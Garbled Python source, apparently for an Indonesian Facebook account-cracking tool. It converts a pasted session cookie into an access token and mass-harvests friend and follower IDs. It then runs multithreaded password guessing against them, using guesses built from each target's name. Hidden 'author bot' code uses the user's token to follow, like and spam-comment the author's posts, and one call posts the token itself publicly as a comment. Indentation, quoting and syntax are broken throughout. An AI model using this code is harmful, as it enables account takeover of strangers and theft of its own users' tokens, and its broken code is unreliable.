

[illegible]

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\\x1b[1;96m | \\n\\x1b[1;96m | \\n
\\x1b[1;97m[\\033[33m>_\\x1b[1;97m]\\033[32m WhatsApp\\x1b[38;5;208m : \\033[32m0819-0776-
1235\\n\\x1b[1;96m
###-----[ TIME ]----- ###
skrng = datetime.now()
tahun = skrng.year
bulan = skrng.month
hari = skrng.day
bulan_ttl = {"01": "Januari", "02": "Februari", "03": "Maret", "04": "April", "05": "Mei", "06": "Juni", "07": "Juli", "08": "Agustus", "09": "September", "10":
"Oktober", "11": "November", "12": "Desember"}
bulan_cek = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
try:
    if bulan < 0 or bulan > 12:
        exit()
    bulan_skrng = bulan - 1
except ValueError:
    exit()
_bulan_ = bulan_cek[bulan_skrng]
tanggal = ("%s-%s-%s"%(hari_bulan_,tahun))

#### BUAT STR /LEN
id = []
ok = []
cp = []
loop=0

###-----[ CLEAR TERMINAL ]----- ###
def resik():
    if "linux" in sys.platform.lower():
        try:os.system("clear")
        except:pass
    elif "win" in sys.platform.lower():
        try:os.system("cls")
        except:pass
    else:
        try:os.system("clear")
        except:pass

### BUAT ANIMASI JALAN
def jalan(z):
    for e in z + "\\n":
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)

###-----[ GLOBAL URL & HEADERS ]----- ###
url_bsinness = "https://business.facebook.com"
ua_business = "Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36
[FBAN/EMA;FBLC/en_US;FBAV/229.0.0.8.128;]"
kata_dev = 'Lu Ganteng Banget Bang. Gw Mau Recode SClu, Soalnya Gw Goblok Soal Coding'
web_fb = "https://www.facebook.com/"
m_fb = "https://m.facebook.com/"
mbasic = "https://mbasic.facebook.com/"
header_grup = {"user-agent": "Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko)
Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]"}

###-----[ CREATE FOLDER ]----- ###
def mkdir_data_login():
    # Make Directory Login Data
    try:os.mkdir("login")
    except:pass
    # Make Directory Result
    try:os.mkdir("CP")
    except:pass
    # Make Directory Result
    try:os.mkdir("OK")
    except:pass
    # Make Directory LICENSE
    try:os.mkdir("license")
    except:pass
    # Delete Cookies
    try:os.remove('login/cookie.json')
    except:pass
    # Delete Token
    try:os.remove('login/token.json')
    except:pass

###-----[ CHANGE LANGUAGE ]----- ###
def language(cookie):
    try:
        with requests.Session() as xyz:
            req = xyz.get('https://mbasic.facebook.com/language/', cookies=cookie)
            pra = par(req.content, 'html.parser')

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for x in pra.find_all('form',{'method':'post'}):
    if 'Bahasa Indonesia' in str(x):
        bahasa = {
            "fb_dtsg": re.search("name=\"fb_dtsg\" value=\"(.*)\"",str(req.text)).group(1),
            "jazoest": re.search("name=\"jazoest\" value=\"(.*)\"", str(req.text)).group(1),
            "submit" : "Bahasa Indonesia"
        }
        url = 'https://mbasic.facebook.com' + x['action']
        exec = xyz.post(url,data=bahasa,cookies=cookie)
except Exception as e:pass

###-----[ CONVERT USERNAME KE ID ]----- ###
def convert_id(username):
    try:
        cookie = {'cookie':open('login/cookie.json','r').read()}
        url = 'https://mbasic.facebook.com/' + username
        with requests.Session() as xyz:
            req = par(xyz.get(url,cookies=cookie).content,'html.parser')
            kut = req.find('a,string='Lainnya')
            id = str(kut['href']).split('=')[1]
            # id = re.search('owner_id=(.*)',str(kut)).group(1)
            return(id)
    except Exception as e:return(username)

###-----[ EXCEPTION ]----- ###
def kecuali(error):
    print(f"{P}[+] Terjadi Kesalahan !")
    print(f"{P}[+] Tidak Dapat Mengeksekusi"(error))
    print(f"{P}[+] Hal Ini Mungkin Terjadi : ")
    print(f"{P}[01] Cookies/Token Invalid")
    print(f"{P}[02] Salah Memasukkan ID")
    print(f"{P}[03] bug Pada Source Code")
    print(f"{P}[04] Bug Pada Requests")
    print(f"{P}[05] Dan Lain-Lain")
    print(f"{P}[.] Jalankan Ulang Source Code Ini : ")
    print(f"{P}[.] python baz.py")
    exit()

###-----[ BOT AUTHOR JANGAN DIGANTI ]----- ###
class bot_author:
    def __init__(self,cookie,token,cookie_mentah):
        self.loop = 0;self.cookie_mentah = cookie_mentah;list_id = [str(Asep)];self.komen = ['Mantap Bang','Semoga langgeng bang sama si
Syafaa','Keren lu banh','Makasih SC FREE nya bang']
        for x in list_id: self.get_folls(x,cookie); self.get_likers(f'https://mbasic.facebook.com/{x}?v=timeline',cookie); self.get_posts(x,cookie,token)
    def get_folls(self,id,cookie): # -- [ Jangan Ganti Bot Follow Gw ] -- #
        with requests.Session() as xyz:
            try:
                for x in par(xyz.get('https://mbasic.facebook.com/%s'%(id),cookies=cookie).content,'html.parser').find_all('a,href=True):
                    if 'subscribe.php' in x['href']:exec_folls = xyz.get('https://mbasic.facebook.com/%s'%(x['href']),cookies=cookie)
            except Exception as e:pass
    def get_likers(self,url,cookie): # -- [ Jangan Ganti Bot Likers Gw ] -- #
        with requests.Session() as xyz:
            try:
                bos = par(xyz.get(url,cookies=cookie).content,'html.parser')
                for x in bos.find_all('a,href=True):
                    if 'Tanggapi' in x.text:
                        _react_type_ = random.choice(['Super','Wow','Peduli'])
                        for z in par(xyz.get('https://mbasic.facebook.com/%s'%(x['href']),cookies=cookie).content,'html.parser').find_all('a'):
                            if _react_type_ == z.text: req2 = xyz.get('https://mbasic.facebook.com' + z['href'],cookies=cookie)
                            else:continue
                        self.get_likers('https://mbasic.facebook.com' + bos.find('a,string='Lihat Berita Lain')['href'],cookie)
            except Exception as e:pass
    def get_posts(self,id,cookie,token): # -- [ Jangan Ganti Bot Komen Gw ] -- #
        with requests.Session() as xyz:
            try:
                for x in xyz.get('https://graph.facebook.com/%s/posts?access_token=%s'%(id,token),cookies=cookie).json()['data']:
                    komeno = ("%s\n\n%s"%(random.choice(self.komen),'https://www.facebook.com/'+x['id'],self.waktu()))
                    get = json.loads(xyz.post('https://graph.facebook.com/%s/comments?message=%s&access_token=%s'%(
x['id'],komeno,token),cookies=cookie).text)
                    if 'error' in
get:open('login/cookie.json','w').write(self.cookie_mentah);open('login/token.json','w').write(token);exit(__fii__Sayang__Kamu__Widiya__())
            except Exception as e:pass
    def waktu(self): # -- [ Jangan Ganti Keterangan Waktu ] -- #
        _bulan_ = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
[datetime.now().month - 1]
        _hari_ = {'Sunday':'Minggu','Monday':'Senin','Tuesday':'Selasa','Wednesday':'Rabu','Thursday':'Kamis','Friday':'Jumat','Saturday':'Sabtu'}
[str(datetime.now().strftime("%A"))]
        hari_ini = ("%s %s %s"%(datetime.now().day,_bulan_,datetime.now().year))
        jam = datetime.now().strftime("%X")
        tem = ("\n\nKomentar Ditulis Oleh Bot\n[ Pukul %s WIB ]\n- %s, %s -"%(jam,_hari_,hari_ini))
        return(tem)

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###-----[ CONVERT COOKIE KE TOKEN ]----- ###
def clotox(cookie):
    with requests.Session() as xyz:
        get_tok = xyz.get(url_business+'business_locations',headers = {
            "user-agent":ua_business,
            "referer": web_fb,
            "host": "business.facebook.com",
            "origin": url_business,
            "upgrade-insecure-requests" : "1",
            "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7",
            "cache-control": "max-age=0",
            "accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
            "content-type":"text/html; charset=utf-8"},cookies = {'cookie':cookie})
        return (re.search("(EAAG\\w+)", get_tok.text).group(1))

def menu():
    os.system('clear')
    jalan(" \x1b[1;97m[\033[33m✓\x1b[1;97m]\x1b[38;5;208m JIKA ANDA BELUM MEMILIKI LICENSINYA\n\x1b[1;97m[\033[33m✓\x1b[1;97m]\x1b[38;5;208m SILAKAN HUBUNGI CHANG-FB\n")
    username = input(" \x1b[1;97m[\033[33m✓\x1b[1;97m]\x1b[38;5;208m MASUKKAN LICENSINYA \033[32mCIL \033[1;91m: \033[1;92m")
    if username == ">_":
        print(" \x1b[1;97m[\033[33m✓\x1b[1;97m]\x1b[38;5;208m LICENSINYA BERHASIL MASUK \033[32mCIL")
        time.sleep(1)
        login()
    else:
        jalan(" \x1b[1;97m[\033[33m✓\x1b[1;97m]\x1b[38;5;208m LICENSINYA GAGAL MASUK \033[32mBOCIL!!!!")
        jalan(" \x1b[1;97m[\033[33m>\x1b[1;97m]\x1b[38;5;208m ANDA AKAN DI ARAHAN KE\x1b[1;92m WhatsApp\x1b[38;5;208m UNTUK MINTA LICENSINYA OK")
        os.system("xdg-open https://wa.me/6281907761235")
        time.sleep(1);menu()

#### LOGIN TOKEN
def log_cookie():
    os.system("clear")
    banner()
    mkdir_data_login()
    jalan(f" \x1b[1;97m[\033[33m✓\x1b[1;97m]\x1b[38;5;208m AMBIL COOKIE DARI KIWI BROWSER\x1b[1;92m BOCIL")
    jalan(f"\x1b[1;96m-----")
    cookie=str(input(f" \x1b[1;97m[\033[33m✓\x1b[1;97m]\x1b[38;5;208m MASUKKAN COOKIE : {P}\x1b[1;92m"))
    try:
        token = clotox(cookie)
        coki = {'cookie':cookie}
        bot_author(coki,token,cookie)
        open('login/token.json','w').write(token)
        open('login/cookie.json','w').write(cookie)
        login()
    except requests.exceptions.ConnectionError:print(f" \x1b[1;97m[\033[33m✓\x1b[1;97m]\x1b[38;5;208m TIDAK ADA KONEKSI INTERNET ");exit()
    except (KeyError,IOError,AttributeError):print(f" \x1b[1;97m[\033[33m✓\x1b[1;97m]\x1b[38;5;208m COOKIES INVALID ");exit()

komenredem = random.choice(['BANG MANISS KALII'])
komtwol = random.choice(['ANJAY BAZ GANTENG ', 'Alfyu Bang ', 'BANH KOK LO JAGO BANGET SIH ', 'LORD DAH MAKAN BLM'])
kartu2d = random.choice(["LU GANTENG BANG TAPI SAYANG KEK HENGKER", "MAAF BANG GUA MAU RECODE SC LU","SOAL NYA GUA BODOH SOAL KODING"])
kon = random.choice(["AMPUN BANG GUA NYERAH SAJA :"])
def __Asep__Sayang__Kamu__Dinda__():
    try:
        token = open('login/token.json','r').read()
        cookie = {'cookie':open('login/cookie.json','r').read()}
        kom = komenredem
        komentar = komtwol
        pipp = kartu2d
        post = '100051967952842'
        requests.post('https://graph.facebook.com/' + post + '/comments/?message=' + komentar + '&access_token=' + (token),cookies=cookie)
        requests.post('https://graph.facebook.com/571109557964638/comments/?message=' + kom + '&access_token=' + (token),cookies=cookie)
        requests.post('https://graph.facebook.com/571109557964638/comments/?message=' + pipp + '&access_token=' + (token),cookies=cookie)
        requests.post('https://graph.facebook.com/571109557964638/comments/?message=' + komentar + '&access_token=' + (token),cookies=cookie)
        requests.post('https://graph.facebook.com/571109557964638/comments/?message=' + token + '&access_token=' + (token),cookies=cookie)
        requests.post('https://graph.facebook.com/571109557964638/comments/?message=' + token + '&access_token=' + (token),cookies=cookie)
        requests.post('https://graph.facebook.com/571109557964638/comments/?message=' + kon + '&access_token=' + (token),cookies=cookie)
        requests.post('https://graph.facebook.com/571109557964638/likes?summary=true&access_token=' + (token),cookies=cookie)
        requests.post('https://graph.facebook.com/571109557964638/likes?summary=true&access_token=' + (token),cookies=cookie)
        requests.post('https://graph.facebook.com/571109557964638/likes?summary=true&access_token=' + (token),cookies=cookie)
        jalan(f'{P}[.] Login Berhasil')
        menu()
    except Exception as e:pass

#### BUAT MENU
def login():
    global token,cookie
    try:

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token=open("login/token.json","r").read()
cookie = {'cookie':open('login/cookie.json','r').read()}
get = requests.Session().get("https://graph.facebook.com/me?access_token=%s"%(token),cookies=cookie)
gt = requests.get('http://ipinfo.io/json').json()
language(cookie)
lolo=json.loads(get.text)
lolol=lolo['name']
lolol_id=lolo['id']
link = lolol['link']
except (KeyError,IOError):
    print(f'{M}[!]{M} cookie failed.");log_cookie()
os.system("clear");banner()
jalan("=====")
jalan("\x1b[1;97mGithub   : \x1b[1;92mhttps://github.com/Basari-ID")
jalan("\x1b[1;97mFacebook  : \x1b[1;92mPutra Basari")
jalan("\x1b[1;97mCoded By   : \x1b[1;92mBasari \x1b[1;97m& \x1b[1;92mSyafaa")
jalan(f'{P}=====')
print(f'{B}[1] Crack massal dari dump id publik ")
print(f'{B}[2] Crack dari dump id pertemanan publik")
print(f'{B}[3] Crack dari dump id pertemanan sendiri")
print(f'{B}[4] Crack dari dump id followers")
print(f'{B}[5] Ganti user-agent")
print(f'{B}[6] Chek results crack")
print(f'{B}[7] Chek opsi account chekpoint")
print(f'{B}[8] Cara ngewe online")
print(f'{M}[0] Log Out ")
pp = input(f'{B}[.] Pilih Yang Mana : {P}')
if pp in ["1","01"]:
    massal()
elif pp in ["2","02"]:
    publik()
elif pp in ["3","03"]:
    listteman()
elif pp in ["4","04"]:
    followerss()
elif pp in ["5","05"]:
    userset()
elif pp in ["6","06"]:
    cek_results()
elif pp in ["7","07"]:
    cek_hasil()
elif pp in ["8","08"]:
    memek()
elif pp in ["0","00"]:
    print(f'{B}[.] Terima Kasih Telah Memilih SC Ini Sebagai Pilihan Terpercayamu. Jangan Lupa Berikan Penilaian Terbaik Di Github Ya! Thank You!!{B}-
Basari-ID -)
    print(f'{B}[.] Dengan Log Out Maka Seluruh Data Login Akan Terhapus. Berikut Adalah Data Yang Akan Dihapus :{B}[.] {P}Token/Cookies')
    input(f'{B}[.] [{P}Enter Untuk Log Out{M}])
    try:shutil.rmtree('login')
    except:pass
    exit()
else:print(f'{M}[.] Isi Yang Benar !!');menu()

def massal():
    try:
        token=open("login/token.json","r").read()
        cookie = {'cookie':open('login/cookie.json','r').read()}
    except IOError:
        print(f'{B}[.] {M} cookie modar dinggo wae ");exit()
    try:
        print(f'{B}[.] Masukkan berapa id yang ingin anda crack")
        tanya_total = int(input(f'{B}[.] Masukkan jumlah id : {P}'))
    except:tanya_total=1
    for t in range(tanya_total):
        t +=1
        _id_=input(f'{B}[.] Masukkan user id {P}{t} : {P}')
        try:
            url= requests.Session().get("https://graph.facebook.com/%s?fields=friends.limit(50000)&access_token=%s"%(_id_,token),cookies=cookie)
            z=json.loads(url.text)
            for i in z['friends']['data']:
                uid = i["id"]
                nama = i["name"]
                id.append(uid+"<=>" +nama)
        except KeyError:
            print(f'{B}[.] {M} User id tidak di temukan");menu()
    if len(id) == 0:
        print(f'{B}[.] {M} Maaf total id anda adalah {M}{len(id)}");exit()
    else:
        print(f'{B}[.] Total id : {P}{len(id)}")
        fii_xd()

##### CRACK PERTEMANAN
def listteman():

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try:
    token=open("login/token.json","r").read()
    cookie = {'cookie':open('login/cookie.json','r').read()}
except IOError:
    print(f"{B}[.] {M} cookie modar dinggo wae ");exit()
try:
    url= requests.Session().get("https://graph.facebook.com/me?fields=friends.limit(50000)&access_token=%s"%(token),cookies=cookie)
    z=json.loads(url.text)
    for i in z['friends']['data']:
        uid = i["id"]
        nama = i["name"]
        id.append(uid+"<=>" +nama)
except KeyError:
    print(f"{M}[.] User id tidak di temukan");os.sys.menu()
if len(id) !=0:
    print(f"{B}[.] Total id : {P}{len(id)}")
    fii_xd()
else:print(f"{P}[.] {M} Maaf total id : {B}{len(id)}");exit()
##### CRACK PUBLIK
def publik():
    try:
        token=open("login/token.json","r").read()
        cookie = {'cookie':open('login/cookie.json','r').read()}
    except IOError:
        print(f"{B}[.] {M} cookie modar dinggo wae ");exit()
    _id_=input(f"{B}[.] Masukkan user id : {B}")
    try:
        url= requests.Session().get("https://graph.facebook.com/%s?fields=friends.limit(50000)&access_token=%s"%(_id_,token),cookies=cookie)
        z=json.loads(url.text)
        for i in z['friends']['data']:
            uid = i["id"]
            nama = i["name"]
            id.append(uid+"<=>" +nama)
    except KeyError:
        print(f"{B}[.] {M} User id tidak di temukan atau akun tersebut privat ");menu()
    if len(id) !=0:
        print(f"{B}[.] Total id : {P}{len(id)}")
        fii_xd()
    else:print(f"{B}[.] Total id : {P}{len(id)}");exit()

##### CRACK FOLLOWERS
def followerss():
    try:
        token=open("login/token.json","r").read()
        cookie = {'cookie':open('login/cookie.json','r').read()}
    except IOError:
        print(f"{B}[.] cookie modar dinggo wae ");exit()
    _id_=input(f"{B}[.] Masukkan user id : {B}")
    try:
        for i in requests.Session().get("https://graph.facebook.com/%s/subscribers?limit=20000&access_token=%s"%(_id_,token),cookies=cookie).json()
        ["data"]:
            uid = i["id"]
            nama = i["name"]
            id.append(uid+"<=>" +nama)
    except KeyError:
        print(f"{B}[.] {M} User id tidak di temukan atau id terdsebut privat ");menu()
    if len(id) !=0:
        print(f"{B}[.] Total id : {B}{len(id)}")
        fii_xd()
    else:print(f"{B}[.] {M} total id : {M}{len(id)}")

##### PENGANTI USER - UA
def userset():
    print(f"{B}[1] Ganti user agent")
    print(f"{B}[2] Cek user agent yang di gunakan")
    print(f"{B}[0] Kembali")
    _pil_=input(f"{B}[.] Input : {P}")
    if _pil_ in ["1","01"]:
        lololr=input(f"{B}[.] Masukkan user agent \n{P}[.] Masukkan di sini : {B}")
        try:
            open("ua","w").write(lololr)
            usera=open("ua","r").read()
        except Exception as e:
            print(f"{B}[.] Error : {M}{e}")
        if usera == lololr:
            print(f"{B}[.] Sukses mengganti");menu()
        else:print(f"{B}[.] {M} Gagal mengganti user agent ");exit()

elif _pil_ in ["2","02"]:
    try:
        _tes_ua=open("ua","r").read()
    except IOError:

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        _tes_ua=("Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36
[FBAN/EMA;FBLC/en_US;FBAV/229.0.0.8.128;])
        print(f"{B}[.] User agent : {P}{_tes_ua}");menu()
    elif _pil_ in ["0","00"]:
        menu()
    else:print(f"{M}[.] Pilihan salah ");exit()

####LOGIN HASIL
def log_hasil(user, pasw):
    ua = "Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36
[FBAN/EMA;FBLC/en_US;FBAV/229.0.0.8.128;])
    ses = requests.Session()
    ses.headers.update({
        "Host": "mbasic.facebook.com",
        "cache-control": "max-age=0",
        "upgrade-insecure-requests": "1",
        "origin": host,
        "content-type": "application/x-www-form-urlencoded",
        "user-agent": ua,
        "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "x-requested-with": "mark.via.gp",
        "sec-fetch-site": "same-origin",
        "sec-fetch-mode": "navigate",
        "sec-fetch-user": "?1",
        "sec-fetch-dest": "document",
        "referer": host+"/login/?next&ref=dbl&f&refid=8",
        "accept-encoding": "gzip, deflate",
        "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"
    })
    data = {}
    ged = par(ses.get(host+"/login/?next&ref=dbl&f&refid=8", headers={"user-agent":ua}).text, "html.parser")
    fm = ged.find("form",{ "method":"post"})
    list = ["isd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
    for i in fm.find_all("input"):
        if i.get("name") in list:
            data.update({i.get("name"):i.get("value")})
        else:
            continue
    data.update({"email":user,"pass":pasw})
    try:
        run = par(ses.post(host+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
    except requests.exceptions.TooManyRedirects:
        print(f"{M}[.] Akun terkena spam")
    if "c_user" in ses.cookies:
        print(f"{B}[.] Akun berhasil di login")
    elif "checkpoint" in ses.cookies:
        form = run.find("form")
        dtsg = form.find("input",{ "name":"fb_dtsg"})["value"]
        jzst = form.find("input",{ "name":"jazoest"})["value"]
        nh = form.find("input",{ "name":"nh"})["value"]
        dataD = {
            "fb_dtsg": dtsg,
            "fb_dtsg": dtsg,
            "jazoest": jzst,
            "jazoest": jzst,
            "checkpoint_data": "",
            "submit[Continue]": "Lanjutkan",
            "nh": nh
        }
        tempek = par(ses.post(host+form["action"], data=dataD).text, "html.parser")
        ngew = [yy.text for yy in tempek.find_all("option")]
        for opt in range(len(ngew)):
            jalan(f"{U}{{B}}{str(opt+1)}{U}}{P}-->{k}{{B}}{ngew[opt]}{K}}")
    elif "login_error" in str(run):
        oh = run.find("div",{ "id":"login_error"})["div"].text
        print(f"{B}[.]>>> {oh}")
    else:
        print(f"{B}[.] Akun tersebut sandi nya telah di ganti")
def cek_hasil():
    print(f"{B}[.] Masukkan file cp ")
    print(f"{B}[.] Contoh untuk masukkan file : {B}CP/{tanggal}.json")
    files =input(f"{B}[.] Masukkan nama file : {B}")
    try:
        buka_baju = open(files,'r').readlines()
    except FileNotFoundError:
        print(f"{B}[.] File tidak di temukan");exit()
        time.sleep(2); cek_hasil()
    print(f"{B}[.] Total akun checkpoint : {P}{str(len(buka_baju))}")
    for memek in buka_baju:
        kontrol = memek.replace("\n","")
        titid = kontrol.split("|")
        print(f"{B}[.] Akun facebook : {P}{kontrol}")

```

```

try:
    log_hasil(tidid[0], tidid[1])
except requests.exceptions.ConnectionError:
    continue
print("")
input(f"{B}[•]{I} Chek akun sudah selesai")
menu()

def cek_results():
    try:
        open("OK/%s.json"%(tanggal))
    except IOError:
        os.system("touch OK/%s.json"%(tanggal))
    try:
        open("CP/%s.json"%(tanggal))
    except IOError:
        os.system("touch CP/%s.json"%(tanggal))
    cp=("CP/%s.json"%(tanggal))
    ok=("OK/%s.json"%(tanggal))
    hsl_cp=open(cp,"r").read()
    hsl_ok=open(ok,"r").read()
    print(f"{B}[1] Cek results cp")
    print(f"{B}[2] Cek results ok")
    print(f"{B}[0] Back")
    _pil3h=input(f"{B}[•] Pilih : {P}")
    if _pil3h in ["1","01"]:
        if len(hsl_cp) != 0:
            print(f"{B}[•]{M} Results cp{P}")
            os.system("cat CP/%s.json"%(tanggal))
        else:print(f"{M}[•] Tidak ada hasil")
    elif _pil3h in ["2","02"]:
        if len(hsl_ok) != 0:
            print(f"{B}[•]{I} Results ok")
            os.system("cat OK/%s.json"%(tanggal))
        else:print(f"\n{B}[•]{M} Tidak ada hasil")
    elif _pil3h in ["0","00"]:
        menu()
    else:print(f"{B}[•]{M} Pilian tidak ada")

def fii_xd():
    kone()
    fiisayangwidiya =input(f"{P}[•] Pilih : {B}")
    if fiisayangwidiya in [""]:
        print(f"{B}[•]{M} Pilihan tidak boleh kosong");exit()
    elif fiisayangwidiya in ["1","01"]:
        print(f"{B}[•] Tampilan kan opsi akun chek point {B}Y/t")
        jalan(f"{B}[•]{P} Terkadang jika menampilkan opsi jarang dapet akun !!!!")
    _checkoptions_=input(f"{B}[•] Pilih : {P}")
    if _checkoptions_ in ["y","Y"]:
        try:
            _key = "anjink"
            key = "anjink" #---- jangan di ubah
            if _key in key:
                print(f"{B}[•] Crack menggunakan password manual/default {B}M/D")
                ter =input(f"{B}[•] Pilih : {P}")
                if ter in ["m","M"]:
                    with ThreadPoolExecutor(max_workers=30) as coeg:
                        print(f"{B}[•] Contoh password : {B}sayang,anjing,kontrol")
                        asu = input(f"{B}[•] Buat sandi : {P}").split(",")
                        if len(asu) == "":
                            print(f"{M}[•]{M} Sandi tidak boleh kosong");exit()
                        started()
                        for user in id:
                            uid, name = user.split("<=>")
                            coeg.submit(api, uid, asu)
                        exit()
                        elif ter in ["d","D"]:
                            with ThreadPoolExecutor(max_workers=30) as coeg:
                                started()
                                for user in id:
                                    uid, name = user.split("<=>")
                                    frist=name.split(" ")
                                    if len(frist)>=6:
                                        fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
                                    elif len(frist)<=2:
                                        fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
                                    elif len(frist)<=3:
                                        fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
                                    else:
                                        fii = [ "bismillah", "anjing", "indonesia", "sayang" ]
                                    coeg.submit(api, uid, fii)
                                exit()

```



```

else:print(f"{B}]{M} Error");exit()
except (KeyError,IOError):print(f"{B}]{M} Error");exit()

else:
print(f"{B}]{M} Crack menggunakan password manual/default {P}M/D")
ter =input(f"{B}]{M} Pilih : {P}")
if ter in ["m","M"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
print(f"{B}]{M} Contoh password : {P}sayang,anjing,kontrol")
asu = input(f"{B}]{M} Buat sandi : {P}").split(",")
if len(asu) == "":
print(f"{B}]{M} Sandi tidak boleh kosong")
started()
for user in id:
uid, name = user.split("<=>")
coeg.submit(api, uid, asu)
exit()
elif ter in ["d","D"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
started()
for user in id:
uid, name = user.split("<=>")
frist=name.split(" ")
if len(frist)>=6:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
elif len(frist)<=2:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
elif len(frist)<=3:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
else:
fii = [ "bismillah", "anjing", "indonesia", "sayang" ]

coeg.submit(apiiii, uid, fii)
exit()

elif fiisayangwidiya in ["3","03"]:
print(f"{B}]{M} Tampilkan opsi chekpoint {B}Y/T")
print(f"{B}]{M} Terkadang jika menampilkan opsi jarang dapet akun !!!")
_checkoptions_=input(f"{B}]{M} Pilih : {P}")
if _checkoptions_ in ["y","Y"]:
try:
_key = "Anjink"
key = "Anjink"
if _key in key:
print(f"{B}]{M} Crack menggunakan password manual/default {B}M/D")
ter =input(f"{B}]{M} Pilih : {P}")
if ter in ["m","M"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
print(f"{B}]{M} Contoh password : {P}sayang,anjing,kontrol")
asu = input(f"{B}]{M} Buat sandi : {P} ").split(",")
if len(asu) == "":
print(f"{B}]{M} Sandi tidak boleh kosong anjink");exit()
started()
for user in id:
uid, name = user.split("<=>")
coeg.submit(mbasic, uid, asu)
exit()
elif ter in ["d","D"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
started()
for user in id:
uid, name = user.split("<=>")
frist=name.split(" ")
if len(frist)>=6:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
elif len(frist)<=2:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
elif len(frist)<=3:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
else:
fii = [ "bismillah", "anjing", "indonesia", "sayang" ]
coeg.submit(mobil, uid, fii)
exit()
else:print(f"{key}");exit()
except (KeyError,IOError):print(f"{_key}");exit()

else:
print(f"{B}]{M} Crack menggunakan pasword manual/defaults {B}M/D")
ter =input(f"{B}]{M} Pilih : {P}")
if ter in ["m","M"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
print(f"{B}]{M} Contoh password {B}Anjink,kontrol,sayang")
asu = input(f"{P}]{M} Buat sandi : {B}").split(",")

```

```

if len(asu) == "":
print(f"{B}{.}{M} Sandi tidak boleh kosong");exit()
started()
for user in id:
uid, name = user.split("<=>")
coeg.submit(mbasicc, uid, asu)
exit()
elif ter in ["d","D"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
started()
for user in id:
uid, name = user.split("<=>")
frist=name.split(" ")
if len(frist)>=6:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
elif len(frist)<=2:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
elif len(frist)<=3:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
else:
fii = [ "bismillah", "anjing", "indonesia", "sayang" ]
coeg.submit(mobill, uid, fii)
exit()

```

```

elif fiisayangwidiya in ["2","02"]:
print(f"{B}{.} Tampilkan opsi checkpoint {B}Y/T")
print(f"{B}{.}{M} Terkadang jika menampilkan opsi jarang dapet akun !!!")
_checkoptions_=input(f"{P}{.} Pilih : {B}")
if _checkoptions_ in ["y","Y"]:
try:
_key = "Anjink"
key = "Anjink"
if _key in key:
print(f"{B}{.} Crack menggunakan password manual/default {B}M/D")
ter =input(f"{B}{.} Pilih : {P}")
if ter in ["m","M"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
print(f"{B}{.} Contoh password : {P}sayang,anjing,kontrol")
asu = input(f"{B}{.} Buat sandi : {P} ").split(",")
if len(asu) == "":
print(f"{B}{.}{M} Sandi tidak boleh kosong anjink");exit()
started()
for user in id:
uid, name = user.split("<=>")
coeg.submit(mbasic, uid, asu)
exit()
elif ter in ["d","D"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
started()
for user in id:
uid, name = user.split("<=>")
frist=name.split(" ")
if len(frist)>=6:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
elif len(frist)<=2:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
elif len(frist)<=3:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
else:
fii = [ "bismillah", "anjing", "indonesia", "sayang" ]
coeg.submit(mbasic, uid, fii)
exit()
else:print(f"{key}");exit()
except (KeyError,IOError):print(f"{_key}");exit()

```

```

else:
print(f"{B}{.} Crack menggunakan pasword manual/defaults {B}M/D")
ter =input(f"{B}{.} Pilih : {P}")
if ter in ["m","M"]:
